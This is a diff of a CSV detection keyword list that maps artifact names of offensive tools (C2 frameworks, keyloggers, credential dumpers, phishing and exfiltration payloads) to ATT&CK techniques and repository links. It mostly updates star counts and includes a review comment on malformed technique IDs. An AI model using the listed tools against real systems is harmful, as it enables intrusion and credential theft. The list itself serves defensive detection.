- TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - 
Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*obfuscated_module_source/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1051","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*obfuscated_module_source/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1051","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*obfuscator*antidisassembly.*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*obfuscator.cpp*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense 
Evasion","https://github.com/weak1337/Alcatraz","1","0","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" -"*obfuskittiedump*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*obfuskittiedump*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*objects_constrained_delegation_full.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*objects_rbcd_delegation_full.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*objects_unconstrained_delegation_full.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" 
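Review bot: The re-added `*obfuscate.py grunt*` (covenant) row still writes its sub-techniques with a hyphen, `T1573-001 - T1573-002 - …`, while other rows in this hunk use the ATT&CK dot form (`T1548.002`, `T1547.001`), so a consumer that joins this column to ATT&CK IDs will not match them; the field should read `T1573.001 - T1573.002 - …`. The `*office365userenum.*` (metasploit) row re-added in the next hunk has a related separator problem: `T1204 -T1210` lacks the space after the hyphen and would come out as one fused token if the column is split on ` - `; it should be `T1204 - T1210`. Some of the listed sub-technique numbers (for example `T1573-003` to `T1573-005`) may not correspond to published ATT&CK entries and are worth checking while the row is being touched. Only the star and fork counts change on these lines, so the issue is carried over rather than introduced here.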
@@ -14294,20 +14459,20 @@ "*obscuritylabs/RAI/*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*octetsplicer/LAZYPARIAH*","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/octetsplicer/LAZYPARIAH","1","1","N/A","N/A","2","136","30","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z" "*Octoberfest7/KDStab*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 
- T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" -"*Octoberfest7/TeamsPhisher*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","831","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*Octoberfest7/TeamsPhisher*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" "*octopus.py *","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*OEP_Hiijack_Inject_Load*","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","555","105","2023-08-26T12:48:08Z","2021-01-19T15:57:01Z" "*offensive_notion.exe*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*offensive_notion_darwin_*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*offensive_notion_linux_*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a 
C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*offensive_notion_win_*.exe*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" -"*OffensiveCSharp*DriverQuery*","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*OffensiveCSharp*ETWEventSubscription*","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. 
When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*OffensiveCSharp-master*","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*office2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*office365userenum.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Office-DDE-Payloads*","offensive_tool_keyword","Office-DDE-Payloads","Collection of scripts and templates to generate Word and Excel documents embedded with the DDE. macro-less command execution technique described by @_staaldraad and @0x5A1F (blog post link in References section below). Intended for use during sanctioned red team engagements and/or phishing campaigns.","T1221 - T1222 - T1223","TA0001 - TA0002 - TA0003","N/A","N/A","Phishing","https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads","1","1","N/A","N/A","7","623","161","2023-07-16T08:22:24Z","2017-10-27T22:19:17Z" -"*Offline_WinPwn.ps1*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*OffensiveCSharp*DriverQuery*","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*OffensiveCSharp*ETWEventSubscription*","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for 
Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*OffensiveCSharp-master*","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*office2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*office365userenum.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Office-DDE-Payloads*","offensive_tool_keyword","Office-DDE-Payloads","Collection of scripts and templates to generate Word and Excel documents embedded with the DDE. macro-less command execution technique described by @_staaldraad and @0x5A1F (blog post link in References section below). Intended for use during sanctioned red team engagements and/or phishing campaigns.","T1221 - T1222 - T1223","TA0001 - TA0002 - TA0003","N/A","N/A","Phishing","https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads","1","1","N/A","N/A","7","624","162","2023-07-16T08:22:24Z","2017-10-27T22:19:17Z" +"*Offline_WinPwn.ps1*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*offsecginger/koadic*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*OgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXABFAHYAZQBuAHQAVgBpAGUAdwBlAHIAUgBDAEUALgBwAHMAMQA=*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" "*OG-Sadpanda/SharpCat*","offensive_tool_keyword","cobaltstrike","C# alternative to the linux cat command... Prints file contents to console. 
For use with Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCat","1","1","N/A","10","10","16","5","2021-07-15T15:01:02Z","2021-07-15T14:57:53Z" 
@@ -14320,11 +14485,11 @@ "*OLDNamedPipeServer.ps1*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*OleViewDotNet.psd1*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*OlivierLaflamme/PyExec*","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","9","1","10","6","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" -"*-OMG-Credz-Plz*","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*OMGdump.zip*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential 
Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*OMGLoggerDecoder*","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*omg-payloads*/payloads/*","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*omg-payloads-master*","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*-OMG-Credz-Plz*","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*OMGdump.zip*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential 
Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*OMGLoggerDecoder*","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*omg-payloads*/payloads/*","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*omg-payloads-master*","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "*OmriBaso/BesoToken*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*On_Demand_C2.*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 
- T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*On-Demand_C2_BOF.*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 